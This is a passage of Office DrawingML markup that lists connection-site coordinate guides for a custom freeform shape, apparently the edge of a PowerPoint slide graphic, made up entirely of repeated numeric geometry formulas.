              <a:gd name="connsiteX36" fmla="*/ 462590 w 1349253"/>
              <a:gd name="connsiteY36" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 465321 w 1349253"/>
              <a:gd name="connsiteY37" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 462025 w 1349253"/>
              <a:gd name="connsiteY38" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 463579 w 1349253"/>
              <a:gd name="connsiteY39" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 470488 w 1349253"/>
              <a:gd name="connsiteY40" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 466344 w 1349253"/>
              <a:gd name="connsiteY41" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 481747 w 1349253"/>
              <a:gd name="connsiteY42" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 487650 w 1349253"/>
              <a:gd name="connsiteY43" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 492383 w 1349253"/>
              <a:gd name="connsiteY44" fmla="*/ 4780965 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 493676 w 1349253"/>
              <a:gd name="connsiteY45" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 491483 w 1349253"/>
              <a:gd name="connsiteY46" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 486963 w 1349253"/>
              <a:gd name="connsiteY47" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 482046 w 1349253"/>
              <a:gd name="connsiteY48" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 478611 w 1349253"/>
              <a:gd name="connsiteY49" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 459264 w 1349253"/>
              <a:gd name="connsiteY50" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 460893 w 1349253"/>
              <a:gd name="connsiteY51" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 448593 w 1349253"/>
              <a:gd name="connsiteY52" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 448318 w 1349253"/>
              <a:gd name="connsiteY53" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 434613 w 1349253"/>
              <a:gd name="connsiteY54" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 434521 w 1349253"/>
              <a:gd name="connsiteY55" fmla="*/ 3945686 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 440396 w 1349253"/>
              <a:gd name="connsiteY56" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 462990 w 1349253"/>
              <a:gd name="connsiteY57" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 460248 w 1349253"/>
              <a:gd name="connsiteY58" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 461981 w 1349253"/>
              <a:gd name="connsiteY59" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 465724 w 1349253"/>
              <a:gd name="connsiteY60" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 473886 w 1349253"/>
              <a:gd name="connsiteY61" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 481232 w 1349253"/>
              <a:gd name="connsiteY62" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 480528 w 1349253"/>
              <a:gd name="connsiteY63" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 483971 w 1349253"/>
              <a:gd name="connsiteY64" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 491509 w 1349253"/>
              <a:gd name="connsiteY65" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 505401 w 1349253"/>
              <a:gd name="connsiteY66" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 511168 w 1349253"/>
              <a:gd name="connsiteY67" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 487927 w 1349253"/>
              <a:gd name="connsiteY68" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 463335 w 1349253"/>
              <a:gd name="connsiteY69" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 448810 w 1349253"/>
              <a:gd name="connsiteY70" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 423984 w 1349253"/>
              <a:gd name="connsiteY71" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 381264 w 1349253"/>
              <a:gd name="connsiteY72" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 315516 w 1349253"/>
              <a:gd name="connsiteY73" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 286333 w 1349253"/>
              <a:gd name="connsiteY74" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 273294 w 1349253"/>
              <a:gd name="connsiteY75" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 279293 w 1349253"/>
              <a:gd name="connsiteY76" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 281905 w 1349253"/>
              <a:gd name="connsiteY77" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 258234 w 1349253"/>
              <a:gd name="connsiteY78" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 248121 w 1349253"/>
              <a:gd name="connsiteY79" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 232338 w 1349253"/>
              <a:gd name="connsiteY80" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 229796 w 1349253"/>
              <a:gd name="connsiteY81" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 230789 w 1349253"/>
              <a:gd name="connsiteY82" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 222595 w 1349253"/>
              <a:gd name="connsiteY83" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 203773 w 1349253"/>
              <a:gd name="connsiteY84" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 180330 w 1349253"/>
              <a:gd name="connsiteY85" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 134129 w 1349253"/>
              <a:gd name="connsiteY86" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 106440 w 1349253"/>
              <a:gd name="connsiteY87" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 105566 w 1349253"/>
              <a:gd name="connsiteY88" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 86361 w 1349253"/>
              <a:gd name="connsiteY89" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 92183 w 1349253"/>
              <a:gd name="connsiteY90" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 78268 w 1349253"/>
              <a:gd name="connsiteY91" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 86575 w 1349253"/>
              <a:gd name="connsiteY92" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 87763 w 1349253"/>
              <a:gd name="connsiteY93" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 92448 w 1349253"/>
              <a:gd name="connsiteY94" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 84730 w 1349253"/>
              <a:gd name="connsiteY95" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 74036 w 1349253"/>
              <a:gd name="connsiteY96" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 62772 w 1349253"/>
              <a:gd name="connsiteY97" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 64228 w 1349253"/>
              <a:gd name="connsiteY98" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 75144 w 1349253"/>
              <a:gd name="connsiteY99" fmla="*/ 921368 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 59093 w 1349253"/>
              <a:gd name="connsiteY100" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 28501 w 1349253"/>
              <a:gd name="connsiteY101" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 7451 w 1349253"/>
              <a:gd name="connsiteY102" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 7009 w 1349253"/>
              <a:gd name="connsiteY103" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 16141 w 1349253"/>
              <a:gd name="connsiteY104" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 19 w 1349253"/>
              <a:gd name="connsiteY105" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 7093 w 1349253"/>
              <a:gd name="connsiteY106" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 11001 w 1349253"/>
              <a:gd name="connsiteY107" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 37125 w 1349253"/>
              <a:gd name="connsiteY108" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 36373 w 1349253"/>
              <a:gd name="connsiteY109" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 36203 w 1349253"/>
              <a:gd name="connsiteY110" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 41896 w 1349253"/>
              <a:gd name="connsiteY111" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 58923 w 1349253"/>
              <a:gd name="connsiteY112" fmla="*/ 212860 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 50633 w 1349253"/>
              <a:gd name="connsiteY113" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 62917 w 1349253"/>
              <a:gd name="connsiteY114" fmla="*/ 55288 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY115" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 85947 w 1349253"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 122540 w 1349253"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 134040 w 1349253"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 158779 w 1349253"/>
              <a:gd name="connsiteY6" fmla="*/ 6691589 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 150803 w 1349253"/>
              <a:gd name="connsiteY7" fmla="*/ 6659970 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 168871 w 1349253"/>
              <a:gd name="connsiteY8" fmla="*/ 6594177 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 235868 w 1349253"/>
              <a:gd name="connsiteY9" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 251555 w 1349253"/>
              <a:gd name="connsiteY10" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 278483 w 1349253"/>
              <a:gd name="connsiteY11" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 270395 w 1349253"/>
              <a:gd name="connsiteY12" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 272835 w 1349253"/>
              <a:gd name="connsiteY13" fmla="*/ 6252834 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 250827 w 1349253"/>
              <a:gd name="connsiteY14" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 249625 w 1349253"/>
              <a:gd name="connsiteY15" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 265040 w 1349253"/>
              <a:gd name="connsiteY16" fmla="*/ 6078132 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 252427 w 1349253"/>
              <a:gd name="connsiteY17" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 237656 w 1349253"/>
              <a:gd name="connsiteY18" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 287168 w 1349253"/>
              <a:gd name="connsiteY19" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 316966 w 1349253"/>
              <a:gd name="connsiteY20" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 326089 w 1349253"/>
              <a:gd name="connsiteY21" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 352965 w 1349253"/>
              <a:gd name="connsiteY22" fmla="*/ 5437125 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 366533 w 1349253"/>
              <a:gd name="connsiteY23" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 382514 w 1349253"/>
              <a:gd name="connsiteY24" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 416007 w 1349253"/>
              <a:gd name="connsiteY25" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 425606 w 1349253"/>
              <a:gd name="connsiteY26" fmla="*/ 5241779 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 436832 w 1349253"/>
              <a:gd name="connsiteY27" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 437852 w 1349253"/>
              <a:gd name="connsiteY28" fmla="*/ 5217684 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 445193 w 1349253"/>
              <a:gd name="connsiteY29" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 448496 w 1349253"/>
              <a:gd name="connsiteY30" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 449480 w 1349253"/>
              <a:gd name="connsiteY31" fmla="*/ 5173621 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 445114 w 1349253"/>
              <a:gd name="connsiteY32" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 451791 w 1349253"/>
              <a:gd name="connsiteY33" fmla="*/ 5144295 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 448724 w 1349253"/>
              <a:gd name="connsiteY34" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 455554 w 1349253"/>
              <a:gd name="connsiteY35" fmla="*/ 5121884 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 462590 w 1349253"/>
              <a:gd name="connsiteY36" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 465321 w 1349253"/>
              <a:gd name="connsiteY37" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 462025 w 1349253"/>
              <a:gd name="connsiteY38" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 463579 w 1349253"/>
              <a:gd name="connsiteY39" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 470488 w 1349253"/>
              <a:gd name="connsiteY40" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 466344 w 1349253"/>
              <a:gd name="connsiteY41" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 481747 w 1349253"/>
              <a:gd name="connsiteY42" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 487650 w 1349253"/>
              <a:gd name="connsiteY43" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 492383 w 1349253"/>
              <a:gd name="connsiteY44" fmla="*/ 4780965 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 493676 w 1349253"/>
              <a:gd name="connsiteY45" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 491483 w 1349253"/>
              <a:gd name="connsiteY46" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 486963 w 1349253"/>
              <a:gd name="connsiteY47" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 482046 w 1349253"/>
              <a:gd name="connsiteY48" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 478611 w 1349253"/>
              <a:gd name="connsiteY49" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 459264 w 1349253"/>
              <a:gd name="connsiteY50" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 460893 w 1349253"/>
              <a:gd name="connsiteY51" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 448593 w 1349253"/>
              <a:gd name="connsiteY52" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 448318 w 1349253"/>
              <a:gd name="connsiteY53" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 434613 w 1349253"/>
              <a:gd name="connsiteY54" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 440396 w 1349253"/>
              <a:gd name="connsiteY55" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 462990 w 1349253"/>
              <a:gd name="connsiteY56" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 460248 w 1349253"/>
              <a:gd name="connsiteY57" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 461981 w 1349253"/>
              <a:gd name="connsiteY58" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 465724 w 1349253"/>
              <a:gd name="connsiteY59" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 473886 w 1349253"/>
              <a:gd name="connsiteY60" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 481232 w 1349253"/>
              <a:gd name="connsiteY61" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 480528 w 1349253"/>
              <a:gd name="connsiteY62" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 483971 w 1349253"/>
              <a:gd name="connsiteY63" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 491509 w 1349253"/>
              <a:gd name="connsiteY64" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 505401 w 1349253"/>
              <a:gd name="connsiteY65" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 511168 w 1349253"/>
              <a:gd name="connsiteY66" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 487927 w 1349253"/>
              <a:gd name="connsiteY67" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 463335 w 1349253"/>
              <a:gd name="connsiteY68" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 448810 w 1349253"/>
              <a:gd name="connsiteY69" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 423984 w 1349253"/>
              <a:gd name="connsiteY70" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 381264 w 1349253"/>
              <a:gd name="connsiteY71" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 315516 w 1349253"/>
              <a:gd name="connsiteY72" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 286333 w 1349253"/>
              <a:gd name="connsiteY73" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 273294 w 1349253"/>
              <a:gd name="connsiteY74" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 279293 w 1349253"/>
              <a:gd name="connsiteY75" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 281905 w 1349253"/>
              <a:gd name="connsiteY76" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 258234 w 1349253"/>
              <a:gd name="connsiteY77" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 248121 w 1349253"/>
              <a:gd name="connsiteY78" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 232338 w 1349253"/>
              <a:gd name="connsiteY79" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 229796 w 1349253"/>
              <a:gd name="connsiteY80" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 230789 w 1349253"/>
              <a:gd name="connsiteY81" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 222595 w 1349253"/>
              <a:gd name="connsiteY82" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 203773 w 1349253"/>
              <a:gd name="connsiteY83" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 180330 w 1349253"/>
              <a:gd name="connsiteY84" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 134129 w 1349253"/>
              <a:gd name="connsiteY85" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 106440 w 1349253"/>
              <a:gd name="connsiteY86" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 105566 w 1349253"/>
              <a:gd name="connsiteY87" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 86361 w 1349253"/>
              <a:gd name="connsiteY88" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 92183 w 1349253"/>
              <a:gd name="connsiteY89" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 78268 w 1349253"/>
              <a:gd name="connsiteY90" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 86575 w 1349253"/>
              <a:gd name="connsiteY91" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 87763 w 1349253"/>
              <a:gd name="connsiteY92" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 92448 w 1349253"/>
              <a:gd name="connsiteY93" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 84730 w 1349253"/>
              <a:gd name="connsiteY94" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 74036 w 1349253"/>
              <a:gd name="connsiteY95" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 62772 w 1349253"/>
              <a:gd name="connsiteY96" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 64228 w 1349253"/>
              <a:gd name="connsiteY97" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 75144 w 1349253"/>
              <a:gd name="connsiteY98" fmla="*/ 921368 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 59093 w 1349253"/>
              <a:gd name="connsiteY99" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 28501 w 1349253"/>
              <a:gd name="connsiteY100" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 7451 w 1349253"/>
              <a:gd name="connsiteY101" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 7009 w 1349253"/>
              <a:gd name="connsiteY102" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 16141 w 1349253"/>
              <a:gd name="connsiteY103" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 19 w 1349253"/>
              <a:gd name="connsiteY104" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 7093 w 1349253"/>
              <a:gd name="connsiteY105" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 11001 w 1349253"/>
              <a:gd name="connsiteY106" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 37125 w 1349253"/>
              <a:gd name="connsiteY107" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 36373 w 1349253"/>
              <a:gd name="connsiteY108" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 36203 w 1349253"/>
              <a:gd name="connsiteY109" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 41896 w 1349253"/>
              <a:gd name="connsiteY110" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 58923 w 1349253"/>
              <a:gd name="connsiteY111" fmla="*/ 212860 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 50633 w 1349253"/>
              <a:gd name="connsiteY112" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 62917 w 1349253"/>
              <a:gd name="connsiteY113" fmla="*/ 55288 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY114" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 85947 w 1349253"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 122540 w 1349253"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 134040 w 1349253"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 158779 w 1349253"/>
              <a:gd name="connsiteY6" fmla="*/ 6691589 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 150803 w 1349253"/>
              <a:gd name="connsiteY7" fmla="*/ 6659970 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 168871 w 1349253"/>
              <a:gd name="connsiteY8" fmla="*/ 6594177 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 235868 w 1349253"/>
              <a:gd name="connsiteY9" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 251555 w 1349253"/>
              <a:gd name="connsiteY10" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 278483 w 1349253"/>
              <a:gd name="connsiteY11" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 270395 w 1349253"/>
              <a:gd name="connsiteY12" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 272835 w 1349253"/>
              <a:gd name="connsiteY13" fmla="*/ 6252834 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 250827 w 1349253"/>
              <a:gd name="connsiteY14" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 249625 w 1349253"/>
              <a:gd name="connsiteY15" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 265040 w 1349253"/>
